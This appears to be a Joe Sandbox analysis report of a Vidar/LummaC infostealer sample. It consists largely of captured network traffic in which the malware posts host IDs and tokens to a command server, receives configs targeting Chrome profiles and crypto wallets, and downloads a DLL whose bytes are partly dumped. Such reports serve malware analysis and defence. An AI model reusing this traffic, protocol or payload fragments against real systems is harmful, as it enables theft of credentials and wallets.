2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 2d 2d 0d Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="hwid"726A042CBC933158821099-a33c7340-61ca------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------HJEHIJEBKEBFBFHIIDHI--
2024-09-25 16:00:24 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 16:00:24 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 34 33 39 66 30 65 30 61 33 61 37 34 39 62 66 62 62 64 35 37 61 33 62 62 32 66 64 62 65 62 33 34 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|439f0e0a3a749bfbbd57a3bb2fdbeb34\|1\|1\|1\|0\|0\|50000\|10

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:25 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:25 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 33 39 66 30 65 30 61 33 61 37 34 39 62 66 62 62 64 35 37 61 33 62 62 32 66 64 62 65 62 33 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="token"439f0e0a3a749bfbbd57a3bb2fdbeb34------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------GIIEGHIDBGHIECAAECGDCont
2024-09-25 16:00:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 16:00:26 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:28 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:28 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 33 39 66 30 65 30 61 33 61 37 34 39 62 66 62 62 64 35 37 61 33 62 62 32 66 64 62 65 62 33 34 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------DGCAAFBFBKFIDGDHJDBKContent-Disposition: form-data; name="token"439f0e0a3a749bfbbd57a3bb2fdbeb34------DGCAAFBFBKFIDGDHJDBKContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------DGCAAFBFBKFIDGDHJDBKCont
2024-09-25 16:00:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 16:00:29 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:30 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:31 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:31 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Wednesday, 25-Sep-2024 16:00:31 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 16:00:31 UTC	16120	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-25 16:00:31 UTC	16384	IN	Data Raw: d3 b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-25 16:00:31 UTC	16384	IN	Data Raw: 24 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 Data Ascii: $@:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhS
2024-09-25 16:00:31 UTC	16384	IN	Data Raw: 83 f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-25 16:00:32 UTC	16384	IN	Data Raw: 89 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-25 16:00:32 UTC	16384	IN	Data Raw: 8b 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-25 16:00:32 UTC	16384	IN	Data Raw: 24 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: $td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-25 16:00:33 UTC	16384	IN	Data Raw: fe ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-25 16:00:33 UTC	16384	IN	Data Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-25 16:00:33 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$
2024-09-25 16:00:33 UTC	16384	IN	DELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count() FROM %Q.'%q_%s'tokencharsseparatorsL N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED] r:Y<\|=>MbP?\|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3\|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED] i" i"$i"0i"8i"Di"Pi"\i"hi" xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED] 9/I?hKd?81UH!G?#$0\|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1\|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED] !5ACPRSWYlm pr )Y"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AFIDGDBGCA.exe

C:\ProgramData\BFIIEHJDBK.exe

C:\ProgramData\IIIEBGCBGIDH\AFIDGD

C:\ProgramData\IIIEBGCBGIDH\BFIIEH

C:\ProgramData\IIIEBGCBGIDH\CBKJKJ

C:\ProgramData\IIIEBGCBGIDH\ECGIII

C:\ProgramData\IIIEBGCBGIDH\EHJDHJ

C:\ProgramData\IIIEBGCBGIDH\EHJDHJ-shm

Windows Analysis Report
file.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:34 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJKJDBFIIDHJKEHJEH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:34 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 33 39 66 30 65 30 61 33 61 37 34 39 62 66 62 62 64 35 37 61 33 62 62 32 66 64 62 65 62 33 34 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="token"439f0e0a3a749bfbbd57a3bb2fdbeb34------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------CBKJKJDBFIIDHJKEHJEHCont
2024-09-25 16:00:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 16:00:35 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:37 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
